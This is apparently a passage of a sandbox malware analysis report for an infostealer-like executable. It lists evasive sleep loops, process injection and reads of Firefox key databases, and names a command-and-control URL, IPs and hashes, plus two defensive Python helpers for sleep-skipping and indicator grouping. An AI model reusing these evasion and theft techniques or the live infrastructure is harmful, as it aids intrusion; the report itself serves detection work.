Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_2_004080D9
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,5_1_00408752
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_1_004080D9 FindFirstFileW,FindNextFileW,FindClose,5_1_004080D9
Contains functionality to query system information
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeCode function: 5_2_00416AD4 memset,GetSystemInfo,5_2_00416AD4
Program exit points
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeAPI call chain: ExitProcess graph end nodegraph_5-37070
Queries a list of all running processes
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 2000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 60000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 1000
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exeThread delayed: delay time: 600000
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3176Thread sleep time: -2000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3264Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3264Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3352Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3352Thread sleep time: -550s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3356Thread sleep time: -60000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3356Thread sleep time: -700s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3388Thread sleep time: -180000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3404Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3404Thread sleep time: -1000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3372Thread sleep time: -600000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3388Thread sleep time: -60000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3284Thread sleep time: -5000s >= -60s
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe TID: 3316Thread sleep time: -500s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Process information set: NOOPENFILEERRORBOX (57 identical calls recorded)
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Code function: 4_2_0040F6D4 memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040F6D4

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Code function: 5_2_0041696F GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,5_2_0041696F
Contains functionality to query the account / user name
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Code function: 4_2_00407206 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_00407206
Contains functionality to query windows version
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Code function: 4_2_00406219 GetVersionExA,4_2_00406219
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\secmod.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\cert8.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wazh7fcp.default\key3.db VolumeInformation
Source: C:\Users\user\Desktop\55SKM_C281171022232400.exe | Queries volume information: C:\ VolumeInformation

Behavior Graph

Behavior Graph ID: 35743 | Sample: 55SKM_C281171022232... | Start date: 31/10/2017 | Architecture: WINDOWS | Score: 76

(Graph image not reproduced; the information recoverable from it is listed below.)

Processes:
  • Process 1 (55SKM_C281171022232...) started from main
  • Process 3 (55SKM_C281171022232...) started by process 1; annotated with counts 12 and 4 (created registry values / created files per the graph legend)
  • Process 4 (55SKM_C281171022232...) started by process 3; count 1
  • Process 5 (55SKM_C281171022232...) started by process 3; count 1
  • Files created by processes 3 and 4

Signatures on processes 1 and 3 (4 further signatures hidden at this level):
  • Injects a PE file into a foreign process
  • Modifies the context of a thread in another process (thread injection)
  • Searches for Windows Mail specific files

Signatures on processes 4 and 5 (5 further signatures hidden at this level):
  • Injects a PE file into a foreign process
  • Modifies the context of a thread in another process (thread injection)

DNS/IP info for process 3:
  • alsharfigroup.com resolved and contacted at 65.60.11.250, port 80 (SINGLEHOP-LLC-SingleHopIncUS, United States)

Simulations

Behavior and APIs

Time | Type | Description
22:56:02 | API Interceptor | 233x Sleep call for process: 55SKM_C281171022232400.exe modified from: 60000ms to: 500ms
22:57:44 | API Interceptor | 1x Sleep call for process: 55SKM_C281171022232400.exe modified from: 600000ms to: 500ms
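The evasive-loop signature lines above and the two API Interceptor rows describe the same mechanism from both sides: the sample asks for long delays, and the sandbox rewrites the long ones so the analysis finishes in minutes rather than hours. The Python script below is an added example, not Joe Sandbox code. It parses the TID sleep lines copied from this report, flags the threads that trip the "long sleeps (>= 3 min)" heuristic, and models sleep skipping. Two things are assumptions: that the magnitude in "-2000s" is the requested delay in milliseconds (consistent with the Simulations rows, which show 60000ms and 600000ms), and the threshold at which the interceptor shortens a call (SHORTEN_AT_MS); the report only shows that 60000ms and 600000ms calls were rewritten to 500ms.

```python
import re
from collections import defaultdict

# Constructed input: the "May sleep (evasive loops)" source lines from this
# report, without the path prefix. Reading the number as milliseconds is an
# assumption (see lead-in).
SLEEP_LINES = """\
TID: 3176 Thread sleep time: -2000s >= -60s
TID: 3264 Thread sleep time: -1000s >= -60s
TID: 3264 Thread sleep time: -1000s >= -60s
TID: 3352 Thread sleep count: 55 > 30
TID: 3352 Thread sleep time: -550s >= -60s
TID: 3356 Thread sleep time: -60000s >= -60s
TID: 3356 Thread sleep time: -700s >= -60s
TID: 3388 Thread sleep time: -180000s >= -60s
TID: 3404 Thread sleep time: -1000s >= -60s
TID: 3404 Thread sleep time: -1000s >= -60s
TID: 3372 Thread sleep time: -600000s >= -60s
TID: 3388 Thread sleep time: -60000s >= -60s
TID: 3284 Thread sleep time: -5000s >= -60s
TID: 3316 Thread sleep time: -500s >= -60s
"""

SLEEP_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep time:\s*-(\d+)s")
COUNT_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep count:\s*(\d+)")

LONG_SLEEP_MS = 3 * 60 * 1000  # the report's "Contains long sleeps (>= 3 min)" threshold
SHORTEN_AT_MS = 60_000         # assumption: interceptor rewrites delays this long or longer
REPLACEMENT_MS = 500           # value the Simulations rows show being substituted


def parse_sleeps(text):
    """Return (events, counts): events is a list of (tid, ms); counts maps tid -> loop count."""
    events, counts = [], {}
    for line in text.splitlines():
        m = SLEEP_RE.search(line)
        if m:
            events.append((int(m.group(1)), int(m.group(2))))
            continue
        m = COUNT_RE.search(line)
        if m:
            counts[int(m.group(1))] = int(m.group(2))
    return events, counts


def total_requested_ms(events):
    """Wall-clock delay the sample asked for if every sleep ran to completion."""
    return sum(ms for _, ms in events)


def per_thread_ms(events):
    totals = defaultdict(int)
    for tid, ms in events:
        totals[tid] += ms
    return dict(totals)


def long_sleepers(events, threshold_ms=LONG_SLEEP_MS):
    """TIDs that issue a single delay at or above the long-sleep threshold."""
    return {tid for tid, ms in events if ms >= threshold_ms}


def simulate_interceptor(events, shorten_at_ms=SHORTEN_AT_MS, replacement_ms=REPLACEMENT_MS):
    """Model sleep skipping: each delay >= shorten_at_ms becomes replacement_ms.
    Returns (effective_ms, [(tid, original_ms, new_ms), ...]) so the analyst can
    compare what the sample requested with what the sandbox actually granted."""
    effective, modified = 0, []
    for tid, ms in events:
        if ms >= shorten_at_ms:
            modified.append((tid, ms, replacement_ms))
            effective += replacement_ms
        else:
            effective += ms
    return effective, modified


EVENTS, LOOP_COUNTS = parse_sleeps(SLEEP_LINES)

if __name__ == "__main__":
    granted, mods = simulate_interceptor(EVENTS)
    print("requested:", total_requested_ms(EVENTS), "ms")
    print("granted:  ", granted, "ms after shortening", len(mods), "calls")
    print("long-sleep threads:", sorted(long_sleepers(EVENTS)))
    print("busy-loop counts:", LOOP_COUNTS)
```

Run as-is, the script reports roughly 15 minutes of requested delay collapsing to under 15 seconds once the four calls at or above the assumed threshold are rewritten, which is why the overall analysis finished in 5m36s. Lowering SHORTEN_AT_MS too far is the usual trade-off: a sample that measures elapsed time around its Sleep (GetTickCount/QueryPerformanceCounter, both present in this binary's time-query function) can notice the shortened delay.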

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud
alsharfigroup.com | 2% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
65.60.11.250 | 5Quote P295 E0H000723.exe | 05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2 | malicious | alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
65.60.11.250 | 49Transfer slip 4th october.exe | 65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9e | malicious | alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
65.60.11.250 | 37Transfer slip 4th october.exe | 02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807a | malicious | alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
65.60.11.250 | 59Quote P295 E0H000723.exe | aad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdb | malicious | alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php
65.60.11.250 | 34SKM_C281171022232400.exe | b087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8 | malicious | alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
alsharfigroup.com | 5Quote P295 E0H000723.exe | 05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2 | malicious | 65.60.11.250
alsharfigroup.com | 49Transfer slip 4th october.exe | 65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9e | malicious | 65.60.11.250
alsharfigroup.com | 37Transfer slip 4th october.exe | 02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807a | malicious | 65.60.11.250
alsharfigroup.com | 59Quote P295 E0H000723.exe | aad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdb | malicious | 65.60.11.250
alsharfigroup.com | 34SKM_C281171022232400.exe | b087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8 | malicious | 65.60.11.250

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
SINGLEHOP-LLC-SingleHopIncUS | http://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177 | (URL, no hash) | malicious | 99.198.108.197
SINGLEHOP-LLC-SingleHopIncUS | 62xODR16xfHn.exe | d331a13b5099238cdea6c0eb671f45a0abad6435cbac624ce9e9da9648093292 | malicious | 184.154.34.130
SINGLEHOP-LLC-SingleHopIncUS | Tracking#2030746424-RYV#QZK (28 Sep 17).doc | 75b5917957afff62ae3e9b349f0cd9ef63d06b68cb9ed32ad08158b42bf66b4f | malicious | 77.104.144.54
SINGLEHOP-LLC-SingleHopIncUS | paymant.xls | 683a02ae09a10ebafd3658e6b958fc9d35337ea0985b4fdacc037e089f12d4b6 | malicious | 37.60.244.119
SINGLEHOP-LLC-SingleHopIncUS | BUNZBzsGYF.exe | 9a03851292b4bf75ccdb12a9a09055b0c82b044c5a7a543a52ef8ed7546033a9 | malicious | 173.236.48.139
SINGLEHOP-LLC-SingleHopIncUS | 5Quote P295 E0H000723.exe | 05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2 | malicious | 65.60.11.250
SINGLEHOP-LLC-SingleHopIncUS | mededsys.com/zeLrq/ | (URL, no hash) | malicious | 173.236.11.203
SINGLEHOP-LLC-SingleHopIncUS | 49Transfer slip 4th october.exe | 65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9e | malicious | 65.60.11.250
SINGLEHOP-LLC-SingleHopIncUS | 37Transfer slip 4th october.exe | 02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807a | malicious | 65.60.11.250
SINGLEHOP-LLC-SingleHopIncUS | malware.doc | c9210a349a1b50461703f7ef2b2f988b847e74a00bcf8735ee2b4cf9712b1fa3 | malicious | 181.224.136.208
SINGLEHOP-LLC-SingleHopIncUS | 59Quote P295 E0H000723.exe | aad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdb | malicious | 65.60.11.250
SINGLEHOP-LLC-SingleHopIncUS | http://amazongiftcard.codegenerator.xyz/ | (URL, no hash) | malicious | 198.20.117.148
SINGLEHOP-LLC-SingleHopIncUS | 34SKM_C281171022232400.exe | b087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8 | malicious | 65.60.11.250
SINGLEHOP-LLC-SingleHopIncUS | 2017-27878.doc | 4bc6d7e5960831476f33ac3d9f632ebae9c2a22aa975d20fffb0830b94bf3143 | malicious | 173.236.11.203
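The three context tables are the pivot an analyst actually wants: five earlier samples with different lure names all post to the same upload.php path on alsharfigroup.com at 65.60.11.250, while the other ASN matches are unrelated tenants of the same hosting provider. The Python script below is an added example, not Joe Sandbox output, that turns the rows copied from the tables above into a de-duplicated indicator set and separates shared command-and-control infrastructure from one-off ASN neighbours. The rule that an indicator counts as shared infrastructure when at least three distinct samples use it (MIN_SHARED) is an assumption; the row data is taken from the tables as printed.

```python
import re
from collections import defaultdict

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
MIN_SHARED = 3  # assumption: distinct samples needed before an indicator counts as shared infra

C2_URL = "alsharfigroup.com/ph7cms/data/system/modules/web/image/upload.php"

# Constructed input copied from the IP, Domain and ASN context tables above.
# The five samples that share this sample's C2 appear under three indicators.
ALSHARFI_SAMPLES = [
    ("5Quote P295 E0H000723.exe", "05ddcfd7bd0f162fceaf66e9bae9e7d574b43a1f730da4c5f37c88dabb3fbee2"),
    ("49Transfer slip 4th october.exe", "65467b2fd4548b407e3ae07b5ca28773caae4f65f0cf5af60d447ec577735f9e"),
    ("37Transfer slip 4th october.exe", "02985ecfb351de15a8793c879ffbcc3b05c3d7b65b4ebacaef3e16453288807a"),
    ("59Quote P295 E0H000723.exe", "aad3b459ea6601c90903b423f61bd66a27e21422819a3bb310a3d98e658b2fdb"),
    ("34SKM_C281171022232400.exe", "b087bef52d494fc65492e5db52bfca51b3495a954b9abdcacdcb3c19ea4909e8"),
]

# (indicator, associated sample or URL, SHA-256 or None when the associated item is a URL)
CONTEXT_ROWS = [
    (ind, name, sha)
    for ind in ("65.60.11.250", "alsharfigroup.com", C2_URL)
    for name, sha in ALSHARFI_SAMPLES
] + [
    ("184.154.34.130", "62xODR16xfHn.exe", "d331a13b5099238cdea6c0eb671f45a0abad6435cbac624ce9e9da9648093292"),
    ("77.104.144.54", "Tracking#2030746424-RYV#QZK (28 Sep 17).doc", "75b5917957afff62ae3e9b349f0cd9ef63d06b68cb9ed32ad08158b42bf66b4f"),
    ("37.60.244.119", "paymant.xls", "683a02ae09a10ebafd3658e6b958fc9d35337ea0985b4fdacc037e089f12d4b6"),
    ("173.236.48.139", "BUNZBzsGYF.exe", "9a03851292b4bf75ccdb12a9a09055b0c82b044c5a7a543a52ef8ed7546033a9"),
    ("173.236.11.203", "mededsys.com/zeLrq/", None),
    ("173.236.11.203", "2017-27878.doc", "4bc6d7e5960831476f33ac3d9f632ebae9c2a22aa975d20fffb0830b94bf3143"),
    ("181.224.136.208", "malware.doc", "c9210a349a1b50461703f7ef2b2f988b847e74a00bcf8735ee2b4cf9712b1fa3"),
    ("99.198.108.197", "http://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177", None),
    ("198.20.117.148", "http://amazongiftcard.codegenerator.xyz/", None),
]


def indicator_kind(indicator):
    """Classify an indicator string as ip, url (anything with a path) or domain."""
    if IPV4_RE.match(indicator):
        return "ip"
    if "/" in indicator:
        return "url"
    return "domain"


def samples_by_indicator(rows):
    """Map indicator -> set of sample keys (SHA-256, or the URL itself for URL rows).
    Rejects malformed hashes so a mistyped IOC does not silently become a new sample."""
    seen = defaultdict(set)
    for indicator, label, sha in rows:
        if sha is not None and not SHA256_RE.match(sha):
            raise ValueError(f"malformed SHA-256 for {label!r}")
        seen[indicator].add(sha or label)
    return dict(seen)


def shared_infrastructure(rows, min_samples=MIN_SHARED):
    """Indicators used by at least min_samples distinct samples, sorted for stable output."""
    return sorted(ind for ind, keys in samples_by_indicator(rows).items() if len(keys) >= min_samples)


def ioc_bundle(rows, seed):
    """Starting from one indicator, collect every indicator that shares a sample with it,
    grouped by kind, plus the sample hashes themselves. This is the pivot from the
    IP table to the Domain table to the C2 URL, done in one step."""
    by_ind = samples_by_indicator(rows)
    keys = set(by_ind.get(seed, ()))
    bundle = {"ip": set(), "domain": set(), "url": set(),
              "sha256": {k for k in keys if SHA256_RE.match(k)}}
    for indicator, sample_keys in by_ind.items():
        if sample_keys & keys:
            bundle[indicator_kind(indicator)].add(indicator)
    return bundle


if __name__ == "__main__":
    print("shared infrastructure:", shared_infrastructure(CONTEXT_ROWS))
    for kind, values in ioc_bundle(CONTEXT_ROWS, "alsharfigroup.com").items():
        print(f"{kind}: {sorted(values)}")
```

Keying URL rows by the URL rather than by a hash keeps the ASN neighbours (mededsys.com, the gift-card lure) from being merged with the upload.php cluster: they share a provider, not a sample.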

Dropped Files

No context

Screenshot